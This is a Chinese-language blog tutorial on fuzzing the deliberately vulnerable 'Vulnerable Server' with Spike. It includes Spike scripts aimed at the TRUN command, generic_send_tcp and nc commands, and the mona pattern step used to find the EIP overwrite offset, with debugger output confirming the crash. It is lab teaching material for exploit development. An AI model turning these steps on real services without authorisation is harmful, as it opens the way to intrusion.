Fuzzing with Spike

准备

Spike这工具kali自带,我用的2017.1

先下载一个有漏洞的软件Vulnerable Server

http://sites.google.com/site/lupingreycorner/vulnserver.zip
或者下面地址
https://samsclass.info/127/proj/vulnserver.zip

将服务器运行起来

通过netstat -ano或者软件的源代码,可以看到监听的是9999端口

小尝试

我们先新建一个test文件,第一个是发送固定字符串,第二行是可变的字符串

1
2
3
~/spikeFuzz/learn# cat test.spk 
s_string("giantbranch");
s_string_variable("giantbranch");

我们在另一台机器用nc监听一下,当作一个服务器,-v可以查看相对详细的一些信息,l是listen,p就是指定道port,k就是keepalive,不然客户端断开,nc也断了

1
nc -kvlp 6666

我们用的是下面这个工具,使用下面已经给出

1
2
3
4
root@kali:~/spikeFuzz/learn# generic_send_tcp 
argc=1
Usage: ./generic_send_tcp host port spike_script SKIPVAR SKIPSTR
./generic_send_tcp 192.168.1.100 701 something.spk 0 0

开fuzz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@kali:~/spikeFuzz/learn# generic_send_tcp 192.168.xxx.xxx 6666 test.spk 0 0
Total Number of Strings is 681
Fuzzing
Fuzzing Variable 0:0
Fuzzing Variable 0:1
Variablesize= 5004
Fuzzing Variable 0:2
Variablesize= 5005
Fuzzing Variable 0:3
Variablesize= 21
Fuzzing Variable 0:4
Variablesize= 3
Fuzzing Variable 0:5
Variablesize= 2
Fuzzing Variable 0:6
Variablesize= 7
Fuzzing Variable 0:7
Variablesize= 48
Fuzzing Variable 0:8
Variablesize= 45
Fuzzing Variable 0:9
Variablesize= 49

查看服务端

实践fuzz vulnserver

我们可以通过nc连接之后查看到服务器的功能

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
~# nc 192.168.52.143 9999
Welcome to Vulnerable Server! Enter HELP for help.
HELP
Valid Commands:
HELP
STATS [stat_value]
RTIME [rtime_value]
LTIME [ltime_value]
SRUN [srun_value]
TRUN [trun_value]
GMON [gmon_value]
GDOG [gdog_value]
KSTET [kstet_value]
GTER [gter_value]
HTER [hter_value]
LTER [lter_value]
KSTAN [lstan_value]
EXIT

文章fuzz的是TRUN命令

1
2
3
s_readline();
s_string("TRUN ");
s_string_variable("COMMAND");

我们Immunity Debug附加上服务器后,开fuzz

1
root@kali:~/spikeFuzz/learn# generic_send_tcp 192.168.52.138 9999 trun.spk 0 0

很快,EIP被覆盖了

我们这次打开wireshark抓包

我们可以看到是端口58644的蹦了,那我们过滤,并追踪tcp流

1
tcp.port == 58644

可以看到应该就是这个包了

我们生成一些定位字符

1
!mona pattern_create 2008

eip覆盖为6f43376f ,计算出偏移是2002,在去调试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
0:001> kv
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
017ef9dc 0033000a 00333878 00000bb8 00000000 0x42424242
017ef9f0 77d3517e 768b6767 00000000 00000000 0x33000a
017efa18 77cc349f 017efb04 77c8d74d 00398dff ntdll!RtlpNtMakeTemporaryKey+0x43ba
017efa2c 77d3517e 77cf7d96 00510000 502c016b ntdll!RtlTryEnterCriticalSection+0x98f
017efa30 77cf7d96 00510000 502c016b 77cc349f ntdll!RtlpNtMakeTemporaryKey+0x43ba
017efa3c 77cc349f 768b6643 7ffdd000 00000000 ntdll!RtlTimeToElapsedTimeFields+0xe902
017efb10 77cc349f 77cc34ca 00000208 00000000 ntdll!RtlTryEnterCriticalSection+0x98f
017efb14 77cc34ca 00000208 00000000 00000000 ntdll!RtlTryEnterCriticalSection+0x98f
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\WS2_32.DLL -
017efb3c 7638140a 5d13f74a 017efc84 00000000 ntdll!RtlTryEnterCriticalSection+0x9ba
00000000 00000000 00000000 00000000 00000000 WS2_32!Ordinal490+0x140a

就是特地在里面写了个strcpy

reference

https://samsclass.info/127/proj/p18-spike.htm

自愿打赏专区